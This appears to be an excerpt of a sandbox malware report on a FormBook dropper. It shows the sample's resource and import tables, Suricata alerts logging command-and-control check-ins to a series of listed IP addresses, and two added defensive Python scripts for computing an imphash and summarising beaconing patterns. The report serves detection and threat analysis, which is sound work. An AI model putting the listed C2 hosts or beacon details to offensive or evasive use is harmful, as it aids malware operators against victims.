RT_ICON | 0xd4670 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd4798 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd48c0 | 0x10d8b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9989130907351854
RT_ICON | 0xe564c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | Great Britain | 0.42335561339169525
RT_ICON | 0xf5e74 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | Great Britain | 0.5058455361360416
RT_ICON | 0xfa09c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | Great Britain | 0.5346473029045643
RT_ICON | 0xfc644 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | Great Britain | 0.6055347091932458
RT_ICON | 0xfd6ec | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | Great Britain | 0.7225177304964538
RT_MENU | 0xfdb54 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xfdba4 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xfe138 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xfe7c4 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xfec54 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xff250 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xff8ac | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xffd14 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xffe6c | 0xa9872 | data | - | - | 1.0003182667853328
RT_GROUP_ICON | 0x1a96e0 | 0x5a | Targa image data - Map 32 x 3467 x 1 +1 | English | Great Britain | 0.7888888888888889
RT_GROUP_ICON | 0x1a973c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1a9750 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1a9764 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1a9778 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1a9854 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Imports
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
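The import table above is the AutoIt3 interpreter's (the report flags the sample as a compiled AutoIt script), so it says little about the FormBook payload that is unpacked at run time; what it is useful for is clustering. The import hash (imphash) used by pefile and VirusTotal is an MD5 over the ordered, normalised import list, and because every compiled AutoIt script ships the same interpreter stub, all such droppers hash to the same value regardless of the embedded script. The function below is an added example, not code from the report or from pefile, that implements that normalisation: DLL name lower-cased with .dll/.ocx/.sys stripped, function name lower-cased, entries joined with commas in import-table order, then MD5. Ordinal-only imports are rendered as "ord<N>" here; pefile additionally maps well-known ordinals of a few system DLLs back to names, which this simplified version does not, so hashes can differ for binaries that import by ordinal. The excerpt of the import table it hashes covers only the first three DLLs, so its output is not the sample's real imphash.

```python
"""Import hash (imphash) over an ordered PE import table.

Added example, not code from the report or from pefile. Follows the pefile / VirusTotal
definition; ordinal imports are simplified to "ord<N>" (pefile resolves some by name).
"""
import hashlib


def _normalise_dll(dll: str) -> str:
    """Lower-case the module name and drop a .dll/.ocx/.sys extension, as pefile does."""
    name = dll.lower()
    for ext in (".dll", ".ocx", ".sys"):
        if name.endswith(ext):
            return name[: -len(ext)]
    return name


def imphash(imports) -> str:
    """imports: iterable of (dll_name, [function name or int ordinal, ...]) in import-table order.

    Order matters: the same DLLs and functions in a different order yield a different hash,
    which is what makes imphash a fingerprint of the linker's layout rather than of the API set.
    """
    entries = []
    for dll, funcs in imports:
        base = _normalise_dll(dll)
        for func in funcs:
            func_name = f"ord{func}" if isinstance(func, int) else func.lower()
            entries.append(f"{base}.{func_name}")
    return hashlib.md5(",".join(entries).encode("ascii", "replace")).hexdigest()


# Excerpt of the sample's import table as listed in the report, in the order shown there.
# Only the first three DLLs are included, so imphash(SAMPLE_IMPORTS_EXCERPT) is NOT the
# sample's real imphash; that needs the complete ordered table.
SAMPLE_IMPORTS_EXCERPT = [
    ("WSOCK32.dll", ["gethostbyname", "recv", "send", "socket", "inet_ntoa", "setsockopt",
                     "ntohs", "WSACleanup", "WSAStartup", "sendto", "htons", "__WSAFDIsSet",
                     "select", "accept", "listen", "bind", "inet_addr", "ioctlsocket",
                     "recvfrom", "WSAGetLastError", "closesocket", "gethostname", "connect"]),
    ("VERSION.dll", ["GetFileVersionInfoW", "VerQueryValueW", "GetFileVersionInfoSizeW"]),
    ("WINMM.dll", ["timeGetTime", "waveOutSetVolume", "mciSendStringW"]),
]


if __name__ == "__main__":
    print("imphash (excerpt only):", imphash(SAMPLE_IMPORTS_EXCERPT))
```

Because the hash is over the interpreter's imports, a match against a known AutoIt imphash tells you "compiled AutoIt script", not "FormBook"; pivot on the RT_RCDATA resource (the compressed script) or on the unpacked payload for family attribution.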
Language of compilation system | Country where language is spoken
English | Great Britain
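The Suricata alerts listed in the table that follows show the FormBook check-in rhythm: for each destination host, three "CnC Checkin (POST) M3" alerts followed by one "CnC Checkin (GET) M2", about 2.7 seconds apart, after which the implant moves on to the next host in its configured list. FormBook mixes its real C2 with decoy hosts, so the destination list is a beaconing pattern to alert on, not a list of confirmed live C2 servers. The script below is an added example, not part of the Joe Sandbox report; it reads Suricata EVE JSON alert lines, isolates the two FormBook SIDs (2855464 and 2855465), reconstructs the per-host POST/GET sequence and computes the median gap between check-ins. The EVE lines it consumes are constructed from eight FormBook rows and one JA3 row of the table (same timestamps, SIDs, ports and addresses), written in the shape Suricata emits for event_type "alert".

```python
"""Beacon-pattern summary over Suricata EVE JSON alerts.

Added example, not part of the Joe Sandbox report. SAMPLE_EVE is constructed from a few
rows of the report's alert table, rewritten as eve.json "alert" events.
"""
import json
from collections import defaultdict
from datetime import datetime
from statistics import median

FORMBOOK_SIDS = {2855464, 2855465}  # ETPRO FormBook CnC Checkin (POST) M3 / (GET) M2

SAMPLE_EVE = """
{"timestamp":"2025-01-09T16:54:07.714217+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49823,"dest_ip":"45.33.2.79","dest_port":80,"proto":"TCP","alert":{"signature_id":2855464,"signature":"ETPRO MALWARE FormBook CnC Checkin (POST) M3","severity":1}}
{"timestamp":"2025-01-09T16:54:10.391004+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49824,"dest_ip":"45.33.2.79","dest_port":80,"proto":"TCP","alert":{"signature_id":2855464,"signature":"ETPRO MALWARE FormBook CnC Checkin (POST) M3","severity":1}}
{"timestamp":"2025-01-09T16:54:13.077070+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49825,"dest_ip":"45.33.2.79","dest_port":80,"proto":"TCP","alert":{"signature_id":2855464,"signature":"ETPRO MALWARE FormBook CnC Checkin (POST) M3","severity":1}}
{"timestamp":"2025-01-09T16:54:15.757014+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49826,"dest_ip":"45.33.2.79","dest_port":80,"proto":"TCP","alert":{"signature_id":2855465,"signature":"ETPRO MALWARE FormBook CnC Checkin (GET) M2","severity":1}}
{"timestamp":"2025-01-09T16:54:21.608591+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49827,"dest_ip":"104.21.32.1","dest_port":80,"proto":"TCP","alert":{"signature_id":2855464,"signature":"ETPRO MALWARE FormBook CnC Checkin (POST) M3","severity":1}}
{"timestamp":"2025-01-09T16:54:24.244183+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49828,"dest_ip":"104.21.32.1","dest_port":80,"proto":"TCP","alert":{"signature_id":2855464,"signature":"ETPRO MALWARE FormBook CnC Checkin (POST) M3","severity":1}}
{"timestamp":"2025-01-09T16:54:26.937990+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49829,"dest_ip":"104.21.32.1","dest_port":80,"proto":"TCP","alert":{"signature_id":2855464,"signature":"ETPRO MALWARE FormBook CnC Checkin (POST) M3","severity":1}}
{"timestamp":"2025-01-09T16:54:29.548389+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49830,"dest_ip":"104.21.32.1","dest_port":80,"proto":"TCP","alert":{"signature_id":2855465,"signature":"ETPRO MALWARE FormBook CnC Checkin (GET) M2","severity":1}}
{"timestamp":"2025-01-09T16:54:42.963333+0100","event_type":"alert","src_ip":"192.168.11.30","src_port":49834,"dest_ip":"23.51.25.15","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
"""


def parse_eve(text: str) -> list:
    """Parse one JSON object per line, keep event_type == alert, return alerts sorted by time."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("event_type") != "alert":
            continue
        alerts.append({
            # Suricata writes "+0100" style offsets; %z accepts that form.
            "ts": datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "dest": ev["dest_ip"],
            "dport": ev["dest_port"],
            "sport": ev["src_port"],
            "sid": ev["alert"]["signature_id"],
            "sig": ev["alert"]["signature"],
            "severity": ev["alert"]["severity"],
        })
    return sorted(alerts, key=lambda a: a["ts"])


def formbook_checkins(alerts: list) -> list:
    return [a for a in alerts if a["sid"] in FORMBOOK_SIDS]


def method_of(alert: dict) -> str:
    """The ET signature names carry the HTTP method in parentheses."""
    sig = alert["sig"]
    return "POST" if "(POST)" in sig else "GET" if "(GET)" in sig else "?"


def per_host_pattern(checkins: list) -> dict:
    """dest_ip -> comma-joined method sequence, in time order."""
    seq = defaultdict(list)
    for a in checkins:
        seq[a["dest"]].append(method_of(a))
    return {host: ",".join(methods) for host, methods in seq.items()}


def median_interval(checkins: list) -> float:
    """Median seconds between consecutive FormBook check-ins (0.0 if fewer than two)."""
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(checkins, checkins[1:])]
    return median(gaps) if gaps else 0.0


def report(alerts: list) -> dict:
    checkins = formbook_checkins(alerts)
    return {
        "c2_candidates": sorted({a["dest"] for a in checkins}),
        "patterns": per_host_pattern(checkins),
        "median_gap_s": median_interval(checkins),
        "other_alerts": len(alerts) - len(checkins),
    }


if __name__ == "__main__":
    print(json.dumps(report(parse_eve(SAMPLE_EVE)), indent=2))
```

On a real eve.json the same functions run unchanged over the file's lines; hosts whose pattern is a repeated "POST,POST,POST,GET" block are the ones to carry into the blocklist, and the median gap gives the period to feed a beaconing detection that does not depend on the ETPRO signatures.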
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T16:52:36.489820+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.30 | 49816 | 23.51.25.15 | 443 | TCP
2025-01-09T16:53:52.051834+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49822 | 194.9.94.85 | 80 | TCP
2025-01-09T16:54:07.714217+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49823 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:10.391004+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49824 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:13.077070+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49825 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:15.757014+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49826 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:21.608591+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49827 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:24.244183+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49828 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:26.937990+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49829 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:29.548389+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49830 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:35.120967+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49831 | 199.192.21.169 | 80 | TCP
2025-01-09T16:54:37.839285+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49832 | 199.192.21.169 | 80 | TCP
2025-01-09T16:54:40.554331+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49833 | 199.192.21.169 | 80 | TCP
2025-01-09T16:54:42.963333+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.30 | 49834 | 23.51.25.15 | 443 | TCP
2025-01-09T16:54:43.248467+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49835 | 199.192.21.169 | 80 | TCP
2025-01-09T16:54:58.140683+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49837 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:00.987330+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49838 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:03.815419+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49839 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:06.653934+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49840 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:13.143460+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49841 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:16.828657+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49842 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:19.503582+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49843 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:22.176095+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49844 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:28.531368+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49845 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:31.447955+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49846 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:34.328891+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49847 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:37.221311+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49848 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:42.696549+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49849 | 172.67.132.227 | 80 | TCP
2025-01-09T16:55:45.403920+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49850 | 172.67.132.227 | 80 | TCP
2025-01-09T16:55:47.995536+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49851 | 172.67.132.227 | 80 | TCP
2025-01-09T16:55:50.646653+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49852 | 172.67.132.227 | 80 | TCP
2025-01-09T16:56:04.899063+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49853 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:07.661034+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49854 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:10.433956+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49855 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:13.200101+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49856 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:19.465774+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49857 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:22.308847+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49858 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:25.148181+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49859 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:28.134094+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49860 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:33.688551+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49861 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:36.359727+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49862 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:40.047154+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49863 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:42.719717+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49864 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:48.438417+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49865 | 103.106.67.112 | 80 | TCP
2025-01-09T16:56:49.482152+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.30 | 49866 | 23.51.25.15 | 443 | TCP
2025-01-09T16:56:51.152255+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49867 | 103.106.67.112 | 80 | TCP
2025-01-09T16:56:53.881158+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49868 | 103.106.67.112 | 80 | TCP
2025-01-09T16:56:56.585336+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49869 | 103.106.67.112 | 80 | TCP
2025-01-09T16:57:02.223002+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49870 | 104.21.32.1 | 80 | TCP
